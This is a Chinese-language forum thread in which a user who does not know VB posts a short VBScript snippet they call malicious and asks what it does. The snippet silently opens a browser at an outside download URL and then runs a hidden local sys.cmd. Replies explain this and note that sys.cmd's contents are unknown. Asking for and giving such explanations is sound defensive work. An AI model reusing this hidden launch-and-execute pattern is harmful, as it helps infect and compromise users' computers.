本人不会VB,但看到几行恶意代码,希望大家解释下!
DIM objShell
set objShell=Wscript.createObject("wscript.shell")
iReturn=objShell.Run("cmd.exe /C start /min iexplore  http://dao234.com/index2.html?downxia", 0, TRUE)
iReturn=objShell.Run("cmd.exe /C .\sys.cmd", 0, TRUE)---------------------------------------------------------------
DIM objShell
set objShell=Wscript.createObject("wscript.shell")
iReturn=objShell.Run("cmd.exe /C .\sys.cmd", 0, TRUE)

解决方案 »

  1.   

    好像是先调用IE浏览器打开那个网址http://dao234.com/index2.html?downxia,再执行当前目录下的sys.cmd文件,关键是sys.cmd里是啥内容
      

  2.   

    如楼上所说。要看sys.cmd内容。
      

  3.   

    dao234.com
    这个意思就是,上了这个网站,就得倒下去234个人
      

  4.   

    计算机组成原理→DOS命令→汇编语言→C语言、代码书写规范→数据结构、编译原理、操作系统→计算机网络、数据库原理、正则表达式→其它语言、架构……